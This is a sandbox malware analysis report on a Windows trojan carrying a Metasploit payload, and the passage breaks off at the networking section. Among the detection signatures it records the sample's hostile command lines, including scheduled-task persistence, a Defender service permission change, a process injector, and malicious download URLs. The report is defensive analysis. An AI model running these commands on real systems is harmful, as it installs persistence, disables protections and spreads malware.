Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report 0NlSa5bf55

Overview

General Information

Sample Name:0NlSa5bf55 (renamed file extension from none to exe)
Analysis ID:515565
MD5:ee30d6928c9de84049aa055417cc767e
SHA1:a2aec2076bdfa92e5cda03443bec7b6c3287b43a
SHA256:0ab024b0da0436fddc99679a74a26fdcd9851eb00e88ff2998f001ccd0c9016f
Tags:32exetrojan
Infos:

Most interesting Screenshot:

Detection

Metasploit
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected Metasploit Payload
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Sigma detected: System File Execution Location Anomaly
Found Tor onion address
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses shutdown.exe to shutdown or reboot the system
May modify the system service descriptor table (often done to hook functions)
Machine Learning detection for dropped file
Contains functionality to inject threads in other processes
Performs DNS TXT record lookups
Sigma detected: Suspicious Service DACL Modification
Drops executables to the windows directory (C:\Windows) and starts them
Uses schtasks.exe or at.exe to add and modify task schedules
Drops PE files with benign system names
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
PE file contains sections with non-standard names
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Sample execution stops while process was sleeping (likely an evasion)
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Downloads executable code via HTTP
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Is looking for software installed on the system
Drops files with a non-matching file extension (content does not match file extension)
PE file does not import any functions
PE file contains an invalid checksum
Drops PE files
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Enables security privileges
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • 0NlSa5bf55.exe (PID: 2956 cmdline: "C:\Users\user\Desktop\0NlSa5bf55.exe" MD5: EE30D6928C9DE84049AA055417CC767E)
    • conhost.exe (PID: 2700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • upd.exe (PID: 5716 cmdline: C:\Users\user\Desktop\upd.exe -update MD5: 3C3046F640F7825C720849AAA809C963)
      • upd.exe (PID: 1304 cmdline: "C:\Users\user\Desktop\upd.exe" -update MD5: 3C3046F640F7825C720849AAA809C963)
        • csrss.exe (PID: 464 cmdline: C:\Windows\rss\csrss.exe -cleanup C:\Users\user\Desktop\upd.exe MD5: 3C3046F640F7825C720849AAA809C963)
          • schtasks.exe (PID: 4644 cmdline: schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
            • conhost.exe (PID: 5360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • schtasks.exe (PID: 5916 cmdline: schtasks /delete /tn ScheduledUpdate /f MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
            • conhost.exe (PID: 6324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • mountvol.exe (PID: 6396 cmdline: mountvol B: /s MD5: 5C11B99E6D41403031CD946255E8A353)
            • conhost.exe (PID: 6344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • mountvol.exe (PID: 1312 cmdline: mountvol B: /d MD5: 5C11B99E6D41403031CD946255E8A353)
            • conhost.exe (PID: 4632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • mountvol.exe (PID: 60 cmdline: mountvol B: /s MD5: 5C11B99E6D41403031CD946255E8A353)
            • conhost.exe (PID: 5168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • mountvol.exe (PID: 2056 cmdline: mountvol B: /d MD5: 5C11B99E6D41403031CD946255E8A353)
            • conhost.exe (PID: 6280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • shutdown.exe (PID: 6772 cmdline: shutdown -r -t 5 MD5: E2EB9CC0FE26E28406FB6F82F8E81B26)
            • conhost.exe (PID: 6016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • injector.exe (PID: 6592 cmdline: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll MD5: D98E33B66343E7C96158444127A117F6)
            • conhost.exe (PID: 4640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • windefender.exe (PID: 4940 cmdline: C:\Windows\windefender.exe MD5: E0A50C60A85BFBB9ECF45BFF0239AAA3)
            • conhost.exe (PID: 1460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • cmd.exe (PID: 4072 cmdline: cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD) MD5: F3BDBE3BB6F734E357235F4D5898582D)
              • sc.exe (PID: 5332 cmdline: sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD) MD5: 24A3E2603E63BCB9695A2935D3B24695)
  • svchost.exe (PID: 2008 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • TrustedInstaller.exe (PID: 5352 cmdline: C:\Windows\servicing\TrustedInstaller.exe MD5: 4578046C54A954C917BB393B70BA0AEB)
  • svchost.exe (PID: 6688 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 3544 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6476 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • windefender.exe (PID: 6348 cmdline: C:\Windows\windefender.exe MD5: E0A50C60A85BFBB9ECF45BFF0239AAA3)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmpJoeSecurity_MetasploitPayload_3Yara detected Metasploit PayloadJoe Security
    00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmpJoeSecurity_MetasploitPayload_3Yara detected Metasploit PayloadJoe Security
      0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmpJoeSecurity_MetasploitPayload_3Yara detected Metasploit PayloadJoe Security

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        5.2.upd.exe.9ad080.3.raw.unpackMAL_ME_RawDisk_Agent_Jan20_2Detects suspicious malware using ElRawDiskFlorian Roth
        • 0x3eb18:$s2: The Magic Word!
        • 0x4ac58:$s2: The Magic Word!
        • 0x3ee78:$s3: Software\Oracle\VirtualBox
        • 0x3eb07:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
        8.2.upd.exe.9af2e0.1.raw.unpackMAL_ME_RawDisk_Agent_Jan20_2Detects suspicious malware using ElRawDiskFlorian Roth
        • 0x3c8b8:$s2: The Magic Word!
        • 0x489f8:$s2: The Magic Word!
        • 0x3cc18:$s3: Software\Oracle\VirtualBox
        • 0x3c8a7:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
        8.2.upd.exe.9a76e0.2.raw.unpackMAL_ME_RawDisk_Agent_Jan20_2Detects suspicious malware using ElRawDiskFlorian Roth
        • 0x444b8:$s2: The Magic Word!
        • 0x505f8:$s2: The Magic Word!
        • 0x44818:$s3: Software\Oracle\VirtualBox
        • 0x444a7:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
        8.2.upd.exe.9ad080.3.raw.unpackMAL_ME_RawDisk_Agent_Jan20_2Detects suspicious malware using ElRawDiskFlorian Roth
        • 0x3eb18:$s2: The Magic Word!
        • 0x4ac58:$s2: The Magic Word!
        • 0x3ee78:$s3: Software\Oracle\VirtualBox
        • 0x3eb07:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
        11.2.csrss.exe.9ad080.2.raw.unpackMAL_ME_RawDisk_Agent_Jan20_2Detects suspicious malware using ElRawDiskFlorian Roth
        • 0x3eb18:$s2: The Magic Word!
        • 0x4ac58:$s2: The Magic Word!
        • 0x3ee78:$s3: Software\Oracle\VirtualBox
        • 0x3eb07:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
        Click to see the 7 entries

        Sigma Overview

        System Summary:

        barindex
        Sigma detected: System File Execution Location AnomalyShow sources
        Source: Process startedAuthor: Florian Roth, Patrick Bareiss, Anton Kutepov, oscd.community: Data: Command: C:\Windows\rss\csrss.exe -cleanup C:\Users\user\Desktop\upd.exe, CommandLine: C:\Windows\rss\csrss.exe -cleanup C:\Users\user\Desktop\upd.exe, CommandLine|base64offset|contains: ^j{, Image: C:\Windows\rss\csrss.exe, NewProcessName: C:\Windows\rss\csrss.exe, OriginalFileName: C:\Windows\rss\csrss.exe, ParentCommandLine: "C:\Users\user\Desktop\upd.exe" -update, ParentImage: C:\Users\user\Desktop\upd.exe, ParentProcessId: 1304, ProcessCommandLine: C:\Windows\rss\csrss.exe -cleanup C:\Users\user\Desktop\upd.exe, ProcessId: 464
        Sigma detected: Suspicious Service DACL ModificationShow sources
        Source: Process startedAuthor: Jonhnathan Ribeiro, oscd.community: Data: Command: sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD), CommandLine: sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD), CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\sc.exe, NewProcessName: C:\Windows\SysWOW64\sc.exe, OriginalFileName: C:\Windows\SysWOW64\sc.exe, ParentCommandLine: cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD), ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 4072, ProcessCommandLine: sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD), ProcessId: 5332
        Sigma detected: Windows Processes Suspicious Parent DirectoryShow sources
        Source: Process startedAuthor: vburov: Data: Command: C:\Windows\rss\csrss.exe -cleanup C:\Users\user\Desktop\upd.exe, CommandLine: C:\Windows\rss\csrss.exe -cleanup C:\Users\user\Desktop\upd.exe, CommandLine|base64offset|contains: ^j{, Image: C:\Windows\rss\csrss.exe, NewProcessName: C:\Windows\rss\csrss.exe, OriginalFileName: C:\Windows\rss\csrss.exe, ParentCommandLine: "C:\Users\user\Desktop\upd.exe" -update, ParentImage: C:\Users\user\Desktop\upd.exe, ParentProcessId: 1304, ProcessCommandLine: C:\Windows\rss\csrss.exe -cleanup C:\Users\user\Desktop\upd.exe, ProcessId: 464

        Persistence and Installation Behavior:

        barindex
        Sigma detected: Schedule system processShow sources
        Source: Process startedAuthor: Joe Security: Data: Command: schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F, CommandLine: schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F, CommandLine|base64offset|contains: mj,, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: C:\Windows\rss\csrss.exe -cleanup C:\Users\user\Desktop\upd.exe, ParentImage: C:\Windows\rss\csrss.exe, ParentProcessId: 464, ProcessCommandLine: schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F, ProcessId: 4644

        Jbx Signature Overview

        Click to jump to signature section

        Show All Signature Results

        AV Detection:

        barindex
        Multi AV Scanner detection for submitted fileShow sources
        Source: 0NlSa5bf55.exeVirustotal: Detection: 66%Perma Link
        Source: 0NlSa5bf55.exeReversingLabs: Detection: 64%
        Antivirus detection for URL or domainShow sources
        Source: https://runmodes.com/api/logMachineGuidServiceVersionarch=64&build_number=17134&ec%3Af4%3Abb%3A86%3AAvira URL Cloud: Label: malware
        Source: https://runmodes.com/api/logAvira URL Cloud: Label: malware
        Source: https://runmodes.com/api/log442b90d2-fde4-485f-a003-6086e2191d6e.uuid.trumops.comAvira URL Cloud: Label: malware
        Source: http://newscommer.com/app/app.exeURL Reputation: Label: malware
        Source: https://runmodes.com/api/loginvalidAvira URL Cloud: Label: malware
        Multi AV Scanner detection for domain / URLShow sources
        Source: runmodes.comVirustotal: Detection: 6%Perma Link
        Source: server16.trumops.comVirustotal: Detection: 6%Perma Link
        Source: gohnot.comVirustotal: Detection: 10%Perma Link
        Source: server2.trumops.comVirustotal: Detection: 6%Perma Link
        Antivirus detection for dropped fileShow sources
        Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeAvira: detection malicious, Label: TR/Agent.twerk
        Source: C:\Users\user\Desktop\upd.exeAvira: detection malicious, Label: TR/AD.GoCloudnet.vvvot
        Source: C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dllAvira: detection malicious, Label: TR/Redcap.gsjan
        Source: C:\Windows\windefender.exeAvira: detection malicious, Label: TR/Crypt.XPACK.eocey
        Source: C:\Windows\rss\csrss.exeAvira: detection malicious, Label: TR/AD.GoCloudnet.vvvot
        Multi AV Scanner detection for dropped fileShow sources
        Source: C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dllMetadefender: Detection: 45%Perma Link
        Source: C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dllReversingLabs: Detection: 59%
        Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeMetadefender: Detection: 13%Perma Link
        Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeReversingLabs: Detection: 73%
        Source: C:\Users\user\Desktop\upd.exeMetadefender: Detection: 31%Perma Link
        Source: C:\Users\user\Desktop\upd.exeReversingLabs: Detection: 85%
        Source: C:\Windows\rss\csrss.exeMetadefender: Detection: 31%Perma Link
        Source: C:\Windows\rss\csrss.exeReversingLabs: Detection: 85%
        Source: C:\Windows\windefender.exeMetadefender: Detection: 28%Perma Link
        Source: C:\Windows\windefender.exeReversingLabs: Detection: 78%
        Machine Learning detection for dropped fileShow sources
        Source: C:\Users\user\Desktop\upd.exeJoe Sandbox ML: detected
        Source: C:\Windows\rss\csrss.exeJoe Sandbox ML: detected
        Source: 11.2.csrss.exe.11c38000.10.unpackAvira: Label: TR/Patched.Ren.Gen
        Source: 11.2.csrss.exe.11bb8000.9.unpackAvira: Label: TR/Patched.Ren.Gen
        Source: 0.3.0NlSa5bf55.exe.115f2000.0.unpackAvira: Label: TR/Patched.Ren.Gen
        Source: 0.3.0NlSa5bf55.exe.115f4000.3.unpackAvira: Label: TR/Patched.Ren.Gen
        Source: 0.3.0NlSa5bf55.exe.115f6000.2.unpackAvira: Label: TR/Patched.Ren.Gen
        Source: 0NlSa5bf55.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DEBUG_STRIPPED, RELOCS_STRIPPED
        Source: Binary string: Loader.pdb source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp, bootx64.efi.11.dr
        Source: Binary string: Unrecognized pdb formatThis error indicates attempting to access a .pdb file with source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
        Source: Binary string: A connection with the server could not be establishedAn extended error was returned from the WinHttp serverThe .pdb file is probably no longer indexed in the symbol server share location. source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
        Source: Binary string: Age does not matchThe module age and .pdb age do not match. source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
        Source: Binary string: symsrv.pdb source: upd.exe, 00000005.00000002.321400821.0000000000C57000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.350292388.0000000000C57000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.565483250.0000000000C57000.00000040.00020000.sdmp
        Source: Binary string: Cvinfo is corruptThe .pdb file contains a corrupted debug codeview information. source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
        Source: Binary string: C:\Users\mac\Desktop\driver-process-monitor\x64\Release\WinmonProcessMonitor.pdb source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp
        Source: Binary string: Downloading symbols for [%s] %ssrv*symsrv*http://https://_bad_pdb_file.pdb source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
        Source: Binary string: The symbol server has never indexed any version of this symbol fileNo version of the .pdb file with the given name has ever been registered. source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
        Source: Binary string: C:\Users\Admin\source\repos\ssdt-master\SSDT\win7x64\x64\Release\SSDTHook.pdb source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp
        Source: Binary string: '(.EfiGuardDxe.pdb source: upd.exe.0.dr
        Source: Binary string: PDB not foundUnable to locate the .pdb file in any of the symbol search path locations. source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
        Source: Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\Release\Winmon.pdb source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp
        Source: Binary string: C:\vbox\branch\w64-1.6\out\win.amd64\release\obj\src\VBox\HostDrivers\VBoxDrv\VBoxDrv.pdb source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp
        Source: Binary string: Drive not readyThis error indicates a .pdb file related failure. source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
        Source: Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\x64\Release\Winmon.pdb source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp
        Source: Binary string: Error while loading symbolsUnable to locate the .pdb file in any of the symbol search source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
        Source: Binary string: zzz_AsmCodeRange_*FrameDatainvalid string positionstring too long.pdb source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
        Source: Binary string: C:\Users\vladimir\source\repos\driver-process-monitor\Release\WinmonProcessMonitor.pdb source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp
        Source: Binary string: Pdb read access deniedYou may be attempting to access a .pdb file with read-only attributes source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
        Source: Binary string: Unable to locate the .pdb file in this location source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
        Source: Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\x64\Release\WinmonFS.pdb source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp
        Source: Binary string: The module signature does not match with .pdb signature. source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
        Source: Binary string: .pdb.dbg source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
        Source: Binary string: '(EfiGuardDxe.pdbx source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp, EfiGuardDxe.efi.11.dr
        Source: Binary string: symsrv.pdbGCTL source: upd.exe, 00000005.00000002.321400821.0000000000C57000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.350292388.0000000000C57000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.565483250.0000000000C57000.00000040.00020000.sdmp
        Source: Binary string: or you do not have access permission to the .pdb location. source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
        Source: Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\Release\WinmonFS.pdb source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp
        Source: Binary string: An Exception happened while downloading the module .pdbPlease open a bug if this is a consistent repro. source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
        Source: Binary string: EfiGuardDxe.pdb source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp, EfiGuardDxe.efi.11.dr
        Source: Binary string: C:\Users\Admin\source\repos\ssdt-master\SSDT\win7,10x32\Release\win7x32.pdb source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp
        Source: Binary string: C:\Users\vladimir\source\repos\driver-process-monitor\x64\Release\WinmonProcessMonitor.pdb source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp
        Source: Binary string: Signature does not matchThe module signature does not match with .pdb signature source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
        Source: Binary string: dbghelp.pdb source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
        Source: Binary string: C:\Users\Admin\source\repos\ssdt-master\SSDT\win10x64\x64\Release\SSDTHook.pdb source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp
        Source: Binary string: dbghelp.pdbGCTL source: upd.exe, 00000005.00000002.321110188.0000000000A5B000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.349179433.0000000000A5B000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.564142562.0000000000A5B000.00000040.00020000.sdmp
        Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeCode function: 36_2_00007FF7019D5C10 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,FindClose,

        Networking:

        barindex
        Found Tor onion addressShow sources
